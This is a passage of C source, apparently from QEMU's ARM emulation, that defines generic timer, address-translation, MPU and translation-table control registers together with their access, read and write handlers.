downcounting view of the underlying state */ { .name = "CNTP_TVAL", .cp = 15, .crn = 14, .crm = 2, .opc1 = 0, .opc2 = 0, .secure = ARM_CP_SECSTATE_NS, .type = ARM_CP_NO_RAW | ARM_CP_IO, .access = PL0_RW, .accessfn = gt_ptimer_access, .readfn = gt_phys_redir_tval_read, .writefn = gt_phys_redir_tval_write, }, { .name = "CNTP_TVAL_S", .cp = 15, .crn = 14, .crm = 2, .opc1 = 0, .opc2 = 0, .secure = ARM_CP_SECSTATE_S, .type = ARM_CP_NO_RAW | ARM_CP_IO, .access = PL0_RW, .accessfn = gt_ptimer_access, .readfn = gt_sec_tval_read, .writefn = gt_sec_tval_write, }, { .name = "CNTP_TVAL_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 14, .crm = 2, .opc2 = 0, .type = ARM_CP_NO_RAW | ARM_CP_IO, .access = PL0_RW, .accessfn = gt_ptimer_access, .resetfn = gt_phys_timer_reset, .readfn = gt_phys_redir_tval_read, .writefn = gt_phys_redir_tval_write, }, { .name = "CNTV_TVAL", .cp = 15, .crn = 14, .crm = 3, .opc1 = 0, .opc2 = 0, .type = 
ARM_CP_NO_RAW | ARM_CP_IO, .access = PL0_RW, .accessfn = gt_vtimer_access, .readfn = gt_virt_redir_tval_read, .writefn = gt_virt_redir_tval_write, }, { .name = "CNTV_TVAL_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 14, .crm = 3, .opc2 = 0, .type = ARM_CP_NO_RAW | ARM_CP_IO, .access = PL0_RW, .accessfn = gt_vtimer_access, .resetfn = gt_virt_timer_reset, .readfn = gt_virt_redir_tval_read, .writefn = gt_virt_redir_tval_write, }, /* The counter itself */ { .name = "CNTPCT", .cp = 15, .crm = 14, .opc1 = 0, .access = PL0_R, .type = ARM_CP_64BIT | ARM_CP_NO_RAW | ARM_CP_IO, .accessfn = gt_pct_access, .readfn = gt_cnt_read, .resetfn = arm_cp_reset_ignore, }, { .name = "CNTPCT_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 14, .crm = 0, .opc2 = 1, .access = PL0_R, .type = ARM_CP_NO_RAW | ARM_CP_IO, .accessfn = gt_pct_access, .readfn = gt_cnt_read, }, { .name = "CNTVCT", .cp = 15, .crm = 14, .opc1 = 1, .access = PL0_R, .type = ARM_CP_64BIT | ARM_CP_NO_RAW | ARM_CP_IO, .accessfn = gt_vct_access, .readfn = gt_virt_cnt_read, .resetfn = arm_cp_reset_ignore, }, { .name = "CNTVCT_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 14, .crm = 0, .opc2 = 2, .access = PL0_R, .type = ARM_CP_NO_RAW | ARM_CP_IO, .accessfn = gt_vct_access, .readfn = gt_virt_cnt_read, }, /* Comparison value, indicating when the timer goes off */ { .name = "CNTP_CVAL", .cp = 15, .crm = 14, .opc1 = 2, .secure = ARM_CP_SECSTATE_NS, .access = PL0_RW, .type = ARM_CP_64BIT | ARM_CP_IO | ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_PHYS].cval), .accessfn = gt_ptimer_access, .readfn = gt_phys_redir_cval_read, .raw_readfn = raw_read, .writefn = gt_phys_redir_cval_write, .raw_writefn = raw_write, }, { .name = "CNTP_CVAL_S", .cp = 15, .crm = 14, .opc1 = 2, .secure = ARM_CP_SECSTATE_S, .access = PL0_RW, .type = ARM_CP_64BIT | ARM_CP_IO | ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_SEC].cval), .accessfn = gt_ptimer_access, .writefn = gt_sec_cval_write, .raw_writefn = raw_write, }, { .name = "CNTP_CVAL_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 14, .crm = 2, .opc2 = 2, .access = PL0_RW, .type = ARM_CP_IO, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_PHYS].cval), .resetvalue = 0, .accessfn = gt_ptimer_access, .readfn = gt_phys_redir_cval_read, .raw_readfn = raw_read, .writefn = gt_phys_redir_cval_write, .raw_writefn = raw_write, }, { .name = "CNTV_CVAL", .cp = 15, .crm = 14, .opc1 = 3, .access = PL0_RW, .type = ARM_CP_64BIT | ARM_CP_IO | ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_VIRT].cval), .accessfn = gt_vtimer_access, .readfn = gt_virt_redir_cval_read, .raw_readfn = raw_read, .writefn = gt_virt_redir_cval_write, .raw_writefn = raw_write, }, { .name = "CNTV_CVAL_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 14, .crm = 3, .opc2 = 2, .access = PL0_RW, .type = ARM_CP_IO, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_VIRT].cval), .resetvalue = 0, .accessfn = gt_vtimer_access, .readfn = gt_virt_redir_cval_read, .raw_readfn = raw_read, .writefn = gt_virt_redir_cval_write, .raw_writefn = raw_write, }, /* Secure timer -- this is actually restricted to only EL3 * and configurably Secure-EL1 via the accessfn. 
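* gt_stimer_access() above enforces this: EL3 always succeeds, Secure EL1 additionally needs SCR_EL3.ST, and accesses from EL0, EL2 or Non-secure EL1 trap.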
*/ { .name = "CNTPS_TVAL_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 7, .crn = 14, .crm = 2, .opc2 = 0, .type = ARM_CP_NO_RAW | ARM_CP_IO, .access = PL1_RW, .accessfn = gt_stimer_access, .readfn = gt_sec_tval_read, .writefn = gt_sec_tval_write, .resetfn = gt_sec_timer_reset, }, { .name = "CNTPS_CTL_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 7, .crn = 14, .crm = 2, .opc2 = 1, .type = ARM_CP_IO, .access = PL1_RW, .accessfn = gt_stimer_access, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_SEC].ctl), .resetvalue = 0, .writefn = gt_sec_ctl_write, .raw_writefn = raw_write, }, { .name = "CNTPS_CVAL_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 7, .crn = 14, .crm = 2, .opc2 = 2, .type = ARM_CP_IO, .access = PL1_RW, .accessfn = gt_stimer_access, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_SEC].cval), .writefn = gt_sec_cval_write, .raw_writefn = raw_write, }, REGINFO_SENTINEL }; static CPAccessResult e2h_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (!(arm_hcr_el2_eff(env) & HCR_E2H)) { return CP_ACCESS_TRAP; } return CP_ACCESS_OK; } static void par_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { if (arm_feature(env, ARM_FEATURE_LPAE)) { raw_write(env, ri, value); } else if (arm_feature(env, ARM_FEATURE_V7)) { raw_write(env, ri, value & 0xfffff6ff); } else { raw_write(env, ri, value & 0xfffff1ff); } } /* get_phys_addr() isn't present for user-mode-only targets */ static CPAccessResult ats_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (ri->opc2 & 4) { /* The ATS12NSO* operations must trap to EL3 if executed in * Secure EL1 (which can only happen if EL3 is AArch64). * They are simply UNDEF if executed from NS EL1. * They function normally from EL2 or EL3. */ if (arm_current_el(env) == 1) { if (arm_is_secure_below_el3(env)) { return CP_ACCESS_TRAP_UNCATEGORIZED_EL3; } return CP_ACCESS_TRAP_UNCATEGORIZED; } } return CP_ACCESS_OK; } static uint64_t do_ats_write(CPUARMState *env, uint64_t value, MMUAccessType access_type, ARMMMUIdx mmu_idx) { hwaddr phys_addr; target_ulong page_size; int prot; bool ret; uint64_t par64; bool format64 = false; MemTxAttrs attrs = { 0 }; ARMMMUFaultInfo fi = { 0 }; ARMCacheAttrs cacheattrs = { 0 }; ret = get_phys_addr(env, value, access_type, mmu_idx, &phys_addr, &attrs, &prot, &page_size, &fi, &cacheattrs); if (ret) { /* * Some kinds of translation fault must cause exceptions rather * than being reported in the PAR. */ int current_el = arm_current_el(env); int target_el; uint32_t syn, fsr, fsc; bool take_exc = false; if (fi.s1ptw && current_el == 1 && !arm_is_secure(env) && arm_mmu_idx_is_stage1_of_2(mmu_idx)) { /* * Synchronous stage 2 fault on an access made as part of the * translation table walk for AT S1E0* or AT S1E1* insn * executed from NS EL1. If this is a synchronous external abort * and SCR_EL3.EA == 1, then we take a synchronous external abort * to EL3. Otherwise the fault is taken as an exception to EL2, * and HPFAR_EL2 holds the faulting IPA. */ if (fi.type == ARMFault_SyncExternalOnWalk && (env->cp15.scr_el3 & SCR_EA)) { target_el = 3; } else { env->cp15.hpfar_el2 = extract64(fi.s2addr, 12, 47) << 4; target_el = 2; } take_exc = true; } else if (fi.type == ARMFault_SyncExternalOnWalk) { /* * Synchronous external aborts during a translation table walk * are taken as Data Abort exceptions. 
*/ if (fi.stage2) { if (current_el == 3) { target_el = 3; } else { target_el = 2; } } else { target_el = exception_target_el(env); } take_exc = true; } if (take_exc) { /* Construct FSR and FSC using same logic as arm_deliver_fault() */ if (target_el == 2 || arm_el_is_aa64(env, target_el) || arm_s1_regime_using_lpae_format(env, mmu_idx)) { fsr = arm_fi_to_lfsc(&fi); fsc = extract32(fsr, 0, 6); } else { fsr = arm_fi_to_sfsc(&fi); fsc = 0x3f; } /* * Report exception with ESR indicating a fault due to a * translation table walk for a cache maintenance instruction. */ syn = syn_data_abort_no_iss(current_el == target_el, fi.ea, 1, fi.s1ptw, 1, fsc); env->exception.vaddress = value; env->exception.fsr = fsr; raise_exception(env, EXCP_DATA_ABORT, syn, target_el); } } if (is_a64(env)) { format64 = true; } else if (arm_feature(env, ARM_FEATURE_LPAE)) { /* * ATS1Cxx: * * TTBCR.EAE determines whether the result is returned using the * 32-bit or the 64-bit PAR format * * Instructions executed in Hyp mode always use the 64bit format * * ATS1S2NSOxx uses the 64bit format if any of the following is true: * * The Non-secure TTBCR.EAE bit is set to 1 * * The implementation includes EL2, and the value of HCR.VM is 1 * * (Note that HCR.DC makes HCR.VM behave as if it is 1.) * * ATS1Hx always uses the 64bit format. */ format64 = arm_s1_regime_using_lpae_format(env, mmu_idx); if (arm_feature(env, ARM_FEATURE_EL2)) { if (mmu_idx == ARMMMUIdx_E10_0 || mmu_idx == ARMMMUIdx_E10_1 || mmu_idx == ARMMMUIdx_E10_1_PAN) { format64 |= env->cp15.hcr_el2 & (HCR_VM | HCR_DC); } else { format64 |= arm_current_el(env) == 2; } } } if (format64) { /* Create a 64-bit PAR */ par64 = (1 << 11); /* LPAE bit always set */ if (!ret) { par64 |= phys_addr & ~0xfffULL; if (!attrs.secure) { par64 |= (1 << 9); /* NS */ } par64 |= (uint64_t)cacheattrs.attrs << 56; /* ATTR */ par64 |= cacheattrs.shareability << 7; /* SH */ } else { uint32_t fsr = arm_fi_to_lfsc(&fi); par64 |= 1; /* F */ par64 |= (fsr & 0x3f) << 1; /* FS */ if (fi.stage2) { par64 |= (1 << 9); /* S */ } if (fi.s1ptw) { par64 |= (1 << 8); /* PTW */ } } } else { /* fsr is a DFSR/IFSR value for the short descriptor * translation table format (with WnR always clear). * Convert it to a 32-bit PAR. */ if (!ret) { /* We do not set any attribute bits in the PAR */ if (page_size == (1 << 24) && arm_feature(env, ARM_FEATURE_V7)) { par64 = (phys_addr & 0xff000000) | (1 << 1); } else { par64 = phys_addr & 0xfffff000; } if (!attrs.secure) { par64 |= (1 << 9); /* NS */ } } else { uint32_t fsr = arm_fi_to_sfsc(&fi); par64 = ((fsr & (1 << 10)) >> 5) | ((fsr & (1 << 12)) >> 6) | ((fsr & 0xf) << 1) | 1; } } return par64; } static void ats_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { MMUAccessType access_type = ri->opc2 & 1 ? MMU_DATA_STORE : MMU_DATA_LOAD; uint64_t par64; ARMMMUIdx mmu_idx = 0; int el = arm_current_el(env); bool secure = arm_is_secure_below_el3(env); switch (ri->opc2 & 6) { case 0: /* stage 1 current state PL1: ATS1CPR, ATS1CPW, ATS1CPRP, ATS1CPWP */ switch (el) { case 3: mmu_idx = ARMMMUIdx_SE3; break; case 2: g_assert(!secure); /* TODO: ARMv8.4-SecEL2 */ /* fall through */ case 1: if (ri->crm == 9 && (env->uncached_cpsr & CPSR_PAN)) { mmu_idx = (secure ? ARMMMUIdx_SE10_1_PAN : ARMMMUIdx_Stage1_E1_PAN); } else { mmu_idx = secure ? 
ARMMMUIdx_SE10_1 : ARMMMUIdx_Stage1_E1; } break; default: g_assert_not_reached(); break; } break; case 2: /* stage 1 current state PL0: ATS1CUR, ATS1CUW */ switch (el) { case 3: mmu_idx = ARMMMUIdx_SE10_0; break; case 2: mmu_idx = ARMMMUIdx_Stage1_E0; break; case 1: mmu_idx = secure ? ARMMMUIdx_SE10_0 : ARMMMUIdx_Stage1_E0; break; default: g_assert_not_reached(); break; } break; case 4: /* stage 1+2 NonSecure PL1: ATS12NSOPR, ATS12NSOPW */ mmu_idx = ARMMMUIdx_E10_1; break; case 6: /* stage 1+2 NonSecure PL0: ATS12NSOUR, ATS12NSOUW */ mmu_idx = ARMMMUIdx_E10_0; break; default: g_assert_not_reached(); break; } par64 = do_ats_write(env, value, access_type, mmu_idx); A32_BANKED_CURRENT_REG_SET(env, par, par64); } static void ats1h_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { MMUAccessType access_type = ri->opc2 & 1 ? MMU_DATA_STORE : MMU_DATA_LOAD; uint64_t par64; par64 = do_ats_write(env, value, access_type, ARMMMUIdx_E2); A32_BANKED_CURRENT_REG_SET(env, par, par64); } static CPAccessResult at_s1e2_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_current_el(env) == 3 && !(env->cp15.scr_el3 & SCR_NS)) { return CP_ACCESS_TRAP; } return CP_ACCESS_OK; } static void ats_write64(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { MMUAccessType access_type = ri->opc2 & 1 ? MMU_DATA_STORE : MMU_DATA_LOAD; ARMMMUIdx mmu_idx = 0; int secure = arm_is_secure_below_el3(env); switch (ri->opc2 & 6) { case 0: switch (ri->opc1) { case 0: /* AT S1E1R, AT S1E1W, AT S1E1RP, AT S1E1WP */ if (ri->crm == 9 && (env->pstate & PSTATE_PAN)) { mmu_idx = (secure ? ARMMMUIdx_SE10_1_PAN : ARMMMUIdx_Stage1_E1_PAN); } else { mmu_idx = secure ? ARMMMUIdx_SE10_1 : ARMMMUIdx_Stage1_E1; } break; case 4: /* AT S1E2R, AT S1E2W */ mmu_idx = ARMMMUIdx_E2; break; case 6: /* AT S1E3R, AT S1E3W */ mmu_idx = ARMMMUIdx_SE3; break; default: g_assert_not_reached(); break; } break; case 2: /* AT S1E0R, AT S1E0W */ mmu_idx = secure ? ARMMMUIdx_SE10_0 : ARMMMUIdx_Stage1_E0; break; case 4: /* AT S12E1R, AT S12E1W */ mmu_idx = secure ? ARMMMUIdx_SE10_1 : ARMMMUIdx_E10_1; break; case 6: /* AT S12E0R, AT S12E0W */ mmu_idx = secure ? ARMMMUIdx_SE10_0 : ARMMMUIdx_E10_0; break; default: g_assert_not_reached(); break; } env->cp15.par_el[1] = do_ats_write(env, value, access_type, mmu_idx); } static const ARMCPRegInfo vapa_cp_reginfo[] = { { .name = "PAR", .cp = 15, .crn = 7, .crm = 4, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .resetvalue = 0, .bank_fieldoffsets = { offsetoflow32(CPUARMState, cp15.par_s), offsetoflow32(CPUARMState, cp15.par_ns) }, .writefn = par_write }, /* This underdecoding is safe because the reginfo is NO_RAW. */ { .name = "ATS", .cp = 15, .crn = 7, .crm = 8, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_W, .accessfn = ats_access, .writefn = ats_write, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC }, REGINFO_SENTINEL }; /* Return basic MPU access permission bits. */ static uint32_t simple_mpu_ap_bits(uint32_t val) { uint32_t ret; uint32_t mask; int i; ret = 0; mask = 3; for (i = 0; i < 16; i += 2) { ret |= (val >> i) & mask; mask <<= 2; } return ret; } /* Pad basic MPU access permission bits to extended format. 
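* Each 2-bit field at bit position 2n in the packed value moves up to bit position 4n; for example, packed 0x000f (fields 0 and 1 both 0b11) expands to 0x00000033.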
*/ static uint32_t extended_mpu_ap_bits(uint32_t val) { uint32_t ret; uint32_t mask; int i; ret = 0; mask = 3; for (i = 0; i < 16; i += 2) { ret |= (val & mask) << i; mask <<= 2; } return ret; } static void pmsav5_data_ap_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { env->cp15.pmsav5_data_ap = extended_mpu_ap_bits(value); } static uint64_t pmsav5_data_ap_read(CPUARMState *env, const ARMCPRegInfo *ri) { return simple_mpu_ap_bits(env->cp15.pmsav5_data_ap); } static void pmsav5_insn_ap_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { env->cp15.pmsav5_insn_ap = extended_mpu_ap_bits(value); } static uint64_t pmsav5_insn_ap_read(CPUARMState *env, const ARMCPRegInfo *ri) { return simple_mpu_ap_bits(env->cp15.pmsav5_insn_ap); } static uint64_t pmsav7_read(CPUARMState *env, const ARMCPRegInfo *ri) { uint32_t *u32p = *(uint32_t **)raw_ptr(env, ri); if (!u32p) { return 0; } u32p += env->pmsav7.rnr[M_REG_NS]; return *u32p; } static void pmsav7_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); uint32_t *u32p = *(uint32_t **)raw_ptr(env, ri); if (!u32p) { return; } u32p += env->pmsav7.rnr[M_REG_NS]; tlb_flush(CPU(cpu)); /* Mappings may have changed - purge! */ *u32p = value; } static void pmsav7_rgnr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); uint32_t nrgs = cpu->pmsav7_dregion; if (value >= nrgs) { qemu_log_mask(LOG_GUEST_ERROR, "PMSAv7 RGNR write >= # supported regions, %" PRIu32 " > %" PRIu32 "\n", (uint32_t)value, nrgs); return; } raw_write(env, ri, value); } static const ARMCPRegInfo pmsav7_cp_reginfo[] = { /* Reset for all these registers is handled in arm_cpu_reset(), * because the PMSAv7 is also used by M-profile CPUs, which do * not register cpregs but still need the state to be reset. 
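* pmsav7_read()/pmsav7_write() above index the per-region arrays with pmsav7.rnr, so DRBAR/DRSR/DRACR always operate on the region currently selected through RGNR.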
*/ { .name = "DRBAR", .cp = 15, .crn = 6, .opc1 = 0, .crm = 1, .opc2 = 0, .access = PL1_RW, .type = ARM_CP_NO_RAW, .fieldoffset = offsetof(CPUARMState, pmsav7.drbar), .readfn = pmsav7_read, .writefn = pmsav7_write, .resetfn = arm_cp_reset_ignore }, { .name = "DRSR", .cp = 15, .crn = 6, .opc1 = 0, .crm = 1, .opc2 = 2, .access = PL1_RW, .type = ARM_CP_NO_RAW, .fieldoffset = offsetof(CPUARMState, pmsav7.drsr), .readfn = pmsav7_read, .writefn = pmsav7_write, .resetfn = arm_cp_reset_ignore }, { .name = "DRACR", .cp = 15, .crn = 6, .opc1 = 0, .crm = 1, .opc2 = 4, .access = PL1_RW, .type = ARM_CP_NO_RAW, .fieldoffset = offsetof(CPUARMState, pmsav7.dracr), .readfn = pmsav7_read, .writefn = pmsav7_write, .resetfn = arm_cp_reset_ignore }, { .name = "RGNR", .cp = 15, .crn = 6, .opc1 = 0, .crm = 2, .opc2 = 0, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, pmsav7.rnr[M_REG_NS]), .writefn = pmsav7_rgnr_write, .resetfn = arm_cp_reset_ignore }, REGINFO_SENTINEL }; static const ARMCPRegInfo pmsav5_cp_reginfo[] = { { .name = "DATA_AP", .cp = 15, .crn = 5, .crm = 0, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .type = ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, cp15.pmsav5_data_ap), .readfn = pmsav5_data_ap_read, .writefn = pmsav5_data_ap_write, }, { .name = "INSN_AP", .cp = 15, .crn = 5, .crm = 0, .opc1 = 0, .opc2 = 1, .access = PL1_RW, .type = ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, cp15.pmsav5_insn_ap), .readfn = pmsav5_insn_ap_read, .writefn = pmsav5_insn_ap_write, }, { .name = "DATA_EXT_AP", .cp = 15, .crn = 5, .crm = 0, .opc1 = 0, .opc2 = 2, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.pmsav5_data_ap), .resetvalue = 0, }, { .name = "INSN_EXT_AP", .cp = 15, .crn = 5, .crm = 0, .opc1 = 0, .opc2 = 3, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.pmsav5_insn_ap), .resetvalue = 0, }, { .name = "DCACHE_CFG", .cp = 15, .crn = 2, .crm = 0, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.c2_data), .resetvalue = 0, }, { .name = "ICACHE_CFG", .cp = 15, .crn = 2, .crm = 0, .opc1 = 0, .opc2 = 1, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.c2_insn), .resetvalue = 0, }, /* Protection region base and size registers */ { .name = "946_PRBS0", .cp = 15, .crn = 6, .crm = 0, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.c6_region[0]) }, { .name = "946_PRBS1", .cp = 15, .crn = 6, .crm = 1, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.c6_region[1]) }, { .name = "946_PRBS2", .cp = 15, .crn = 6, .crm = 2, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.c6_region[2]) }, { .name = "946_PRBS3", .cp = 15, .crn = 6, .crm = 3, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.c6_region[3]) }, { .name = "946_PRBS4", .cp = 15, .crn = 6, .crm = 4, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.c6_region[4]) }, { .name = "946_PRBS5", .cp = 15, .crn = 6, .crm = 5, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.c6_region[5]) }, { .name = "946_PRBS6", .cp = 15, .crn = 6, .crm = 6, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.c6_region[6]) }, { .name = "946_PRBS7", .cp = 15, .crn = 6, .crm = 7, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_RW, .resetvalue 
= 0, .fieldoffset = offsetof(CPUARMState, cp15.c6_region[7]) }, REGINFO_SENTINEL }; static void vmsa_ttbcr_raw_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { TCR *tcr = raw_ptr(env, ri); int maskshift = extract32(value, 0, 3); if (!arm_feature(env, ARM_FEATURE_V8)) { if (arm_feature(env, ARM_FEATURE_LPAE) && (value & TTBCR_EAE)) { /* Pre ARMv8 bits [21:19], [15:14] and [6:3] are UNK/SBZP when * using Long-descriptor translation table format */ value &= ~((7 << 19) | (3 << 14) | (0xf << 3)); } else if (arm_feature(env, ARM_FEATURE_EL3)) { /* In an implementation that includes the Security Extensions * TTBCR has additional fields PD0 [4] and PD1 [5] for * Short-descriptor translation table format. */ value &= TTBCR_PD1 | TTBCR_PD0 | TTBCR_N; } else { value &= TTBCR_N; } } /* Update the masks corresponding to the TCR bank being written. * Note that we always calculate mask and base_mask, but * they are only used for short-descriptor tables (i.e. if EAE is 0); * for long-descriptor tables the TCR fields are used differently * and the mask and base_mask values are meaningless. */ tcr->raw_tcr = value; tcr->mask = ~(((uint32_t)0xffffffffu) >> maskshift); tcr->base_mask = ~((uint32_t)0x3fffu >> maskshift); } static void vmsa_ttbcr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); TCR *tcr = raw_ptr(env, ri); if (arm_feature(env, ARM_FEATURE_LPAE)) { /* With LPAE the TTBCR could result in a change of ASID * via the TTBCR.A1 bit, so do a TLB flush. */ tlb_flush(CPU(cpu)); } /* Preserve the high half of TCR_EL1, set via TTBCR2. */ value = deposit64(tcr->raw_tcr, 0, 32, value); vmsa_ttbcr_raw_write(env, ri, value); } static void vmsa_ttbcr_reset(CPUARMState *env, const ARMCPRegInfo *ri) { TCR *tcr = raw_ptr(env, ri); /* Reset both the TCR as well as the masks corresponding to the bank of * the TCR being reset. */ tcr->raw_tcr = 0; tcr->mask = 0; tcr->base_mask = 0xffffc000u; } static void vmsa_tcr_el12_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); TCR *tcr = raw_ptr(env, ri); /* For AArch64 the A1 bit could result in a change of ASID, so TLB flush. */ tlb_flush(CPU(cpu)); tcr->raw_tcr = value; } static void vmsa_ttbr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* If the ASID changes (with a 64-bit write), we must flush the TLB. */ if (cpreg_field_is_64bit(ri) && extract64(raw_read(env, ri) ^ value, 48, 16) != 0) { ARMCPU *cpu = env_archcpu(env); tlb_flush(CPU(cpu)); } raw_write(env, ri, value); } static void vmsa_tcr_ttbr_el2_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* * If we are running with an E2&0 regime, then an ASID is active. * Flush if that might be changing. Note we're not checking * TCR_EL2.A1 to know if this is really the TTBRx_EL2 that * holds the active ASID, only checking the field that might. */ if (extract64(raw_read(env, ri) ^ value, 48, 16) && (arm_hcr_el2_eff(env) & HCR_E2H)) { tlb_flush_by_mmuidx(env_cpu(env), ARMMMUIdxBit_E20_2 | ARMMMUIdxBit_E20_2_PAN | ARMMMUIdxBit_E20_0); } raw_write(env, ri, value); } static void vttbr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); CPUState *cs = CPU(cpu); /* * A change in VMID to the stage2 page table (Stage2) invalidates * the combined stage 1&2 tlbs (EL10_1 and EL10_0).
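* The flush below also includes the Stage2 mmu index, since cached stage 2 entries are tagged with the old VMID.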
*/ if (raw_read(env, ri) != value) { tlb_flush_by_mmuidx(cs, ARMMMUIdxBit_E10_1 | ARMMMUIdxBit_E10_1_PAN | ARMMMUIdxBit_E10_0 | ARMMMUIdxBit_Stage2); raw_write(env, ri, value); } } static const ARMCPRegInfo vmsa_pmsa_cp_reginfo[] = { { .name = "DFSR", .cp = 15, .crn = 5, .crm = 0, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .accessfn = access_tvm_trvm, .type = ARM_CP_ALIAS, .bank_fieldoffsets = { offsetoflow32(CPUARMState, cp15.dfsr_s), offsetoflow32(CPUARMState, cp15.dfsr_ns) }, }, { .name = "IFSR", .cp = 15, .crn = 5, .crm = 0, .opc1 = 0, .opc2 = 1, .access = PL1_RW, .accessfn = access_tvm_trvm, .resetvalue = 0, .bank_fieldoffsets = { offsetoflow32(CPUARMState, cp15.ifsr_s), offsetoflow32(CPUARMState, cp15.ifsr_ns) } }, { .name = "DFAR", .cp = 15, .opc1 = 0, .crn = 6, .crm = 0, .opc2 = 0, .access = PL1_RW, .accessfn = access_tvm_trvm, .resetvalue = 0, .bank_fieldoffsets = { offsetof(CPUARMState, cp15.dfar_s), offsetof(CPUARMState, cp15.dfar_ns) } }, { .name = "FAR_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .crn = 6, .crm = 0, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .accessfn = access_tvm_trvm, .fieldoffset = offsetof(CPUARMState, cp15.far_el[1]), .resetvalue = 0, }, REGINFO_SENTINEL }; static const ARMCPRegInfo vmsa_cp_reginfo[] = { { .name = "ESR_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .crn = 5, .crm = 2, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .accessfn = access_tvm_trvm, .fieldoffset = offsetof(CPUARMState, cp15.esr_el[1]), .resetvalue = 0, }, { .name = "TTBR0_EL1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 2, .crm = 0, .opc2 = 0, .access = PL1_RW, .accessfn = access_tvm_trvm, .writefn = vmsa_ttbr_write, .resetvalue = 0, .bank_fieldoffsets = { offsetof(CPUARMState, cp15.ttbr0_s), offsetof(CPUARMState, cp15.ttbr0_ns) } }, { .name = "TTBR1_EL1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 2, .crm = 0, .opc2 = 1, .access = PL1_RW, .accessfn = access_tvm_trvm, .writefn = vmsa_ttbr_write, .resetvalue = 0, .bank_fieldoffsets = { offsetof(CPUARMState, cp15.ttbr1_s), offsetof(CPUARMState, cp15.ttbr1_ns) } }, { .name = "TCR_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .crn = 2, .crm = 0, .opc1 = 0, .opc2 = 2, .access = PL1_RW, .accessfn = access_tvm_trvm, .writefn = vmsa_tcr_el12_write, .resetfn = vmsa_ttbcr_reset, .raw_writefn = raw_write, .fieldoffset = offsetof(CPUARMState, cp15.tcr_el[1]) }, { .name = "TTBCR", .cp = 15, .crn = 2, .crm = 0, .opc1 = 0, .opc2 = 2, .access = PL1_RW, .accessfn = access_tvm_trvm, .type = ARM_CP_ALIAS, .writefn = vmsa_ttbcr_write, .raw_writefn = 